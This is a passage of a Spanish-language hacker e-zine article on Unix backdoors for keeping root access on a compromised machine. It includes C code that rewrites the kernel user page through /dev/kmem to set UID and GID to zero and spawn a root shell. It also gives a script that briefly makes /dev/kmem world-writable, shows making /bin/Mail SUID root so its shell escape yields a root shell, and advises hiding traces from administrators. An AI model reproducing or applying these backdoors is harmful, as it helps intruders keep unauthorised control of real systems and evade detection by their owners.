<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
printf("Cannot seek to user page\n");</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
perror(argv);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
exit(20);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
count=read(fd,&amp;userpage,sizeof(struct user));</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(count!=sizeof(struct user)){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
printf("Cannot read user page\n");</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
perror(argv);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
exit(30);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
printf("Current UID: %d\n",userpage.u_ruid);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
printf("Current GID: %d\n",userpage.g_ruid);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
userpage.u_ruid=0;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
userpage.u_rgid=0;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
where=lseek(fd,userlocation,0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(where!=userlocation){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
printf("Cannot seek to user page\n");</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
perror(argv);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
exit(40);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
write(fd,&amp;userpage,((char *)&amp;(userpage.u_procp))-((char *)&amp;userpage));</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>} /* End main */</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>#define LNULL ((LDFILE *)0)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>long address(){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
LDFILE *object;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
SYMENT symbol;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
long idx=0;</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
object=ldopen("/unix",LNULL);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(!object){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
fprintf(stderr,"Cannot open /unix.\n");</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
exit(50);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
for(;ldtbread(object,idx,&amp;symbol)==SUCCESS;idx++){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(!strcmp("_u",ldgetname(object,&amp;symbol))){</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
ldclose(object);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
return(symbol.n_value);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
fprintf(stderr,"Cannot read symbol table in /unix.\n");</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
exit(60);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&lt;--></font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Mejoras:&nbsp;&nbsp; Para
ke la no cante musso esto, es mejor dejar un SUID script ke lo ke haga
sea dejar /dev/kmem con permisos 666 durante un corto espacio de tiempo
en el cual, ejecutas el programa, claro esta ke el&nbsp; SUID script casi,
casi canta mas ke dejar /dev/kmem escribible y leible todo el tiempo, tu
decides, el script seria:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>chmod 666 /dev/kmem</font></font>
<br><font face="Arial,Helvetica"><font size=-1>sleep 300&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
# Nap for 5 minutes</font></font>
<br><font face="Arial,Helvetica"><font size=-1>chmod 600 /dev/kmem&nbsp;&nbsp;&nbsp;&nbsp;
# Or whatever it was before</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Recuerda darle los permisos
4111.</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">10-
Escapes de shell</font></b>, bueno, esta otra backdoor a pesar de lo ke
parece, funciona de puta madre y nadie se da cuenta de ella, a no ser ke
sea un hacker de los buenos ke se lo kurra cuando kiere hacerse root, sirve,
para mentener el root (no el acceso), consiste en poner SUID a programas
con escape a shell, como por ejemplo el 'Mail', asi podras ejecutar el
programa y salir a shell y saldras como root, por supuesto, culakiera puede
hacerse root asi, pero nadie se molesta en comprobar si es root cada vez
ke lee un mail.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Osea:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>#chmod 4755 /bin/Mail</font></font>
<br><font face="Arial,Helvetica"><font size=-1>.....</font></font>
<br><font face="Arial,Helvetica"><font size=-1>.....</font></font>
<br><font face="Arial,Helvetica"><font size=-1>$ mail</font></font>
<br><font face="Arial,Helvetica"><font size=-1>you have new mail.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>Bla,bla,bla</font></font>
<br><font face="Arial,Helvetica"><font size=-1>Bla,bla,bla</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&amp;!/bin/sh</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#whoami</font></font>
<br><font face="Arial,Helvetica"><font size=-1>root</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">11-Otras:
</font></b>Hay por ahi muuuuuchos troyanos de programas como su,login (recordad
set 11),passwd,chfn, chsh, etc .... los cuales son tambien backdoors, de
hecho son las mejores, pero a mi me dan muchos quebraderos de kabeza (no
compilan, no encuentras para ese sistema operativo, ....), las backdoors
ke he puesto, funcionan en todos los UNIX, o al menos en casi todos, si
en alguno no funciona, seguro ke solo le tienes ke hacer una peke~a variacion
a la backdoor pa ke funsione.</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Manteniendo la backdoor :</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>El mejor consejo ... Oculta
tus rastros, si un admin no se da cuenta de ke ha sido hackeado, no buscara
backdoor alguna, aparte debes de esconder bien las backdoors. Ten en cuenta
una cosa, si el admin descubre ke ha sido hackeado y es un poco listo,
lo mas seguro es ke encuentre tus backdoors (por checksums, fechas, programas
SUID...) asieske, lo primero es poner la backdoor y lo segundo ocultar
tu rastro.</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<div align=right>
<p><b><font face="Arial,Helvetica"><font color="#FFCC00"><font size=+4><a href="mailto:fatuo@usa.net">Fuego
Fatuo (La KaTeDral)</a></font></font></font></b><font face="Arial,Helvetica"><font color="#FFCC00"><font size=-1></font></font></font>
<p><font face="Arial,Helvetica"><font color="#FFCC00"><font size=-1>Texto
extraido de SET 19: <a href="http://www.set-ezine.org">http://www.set-ezine.org</a></font></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Para insultos, protestas
o amenazas de muerte: root@cpd.um.es</font></font></div>

</body>
</html>
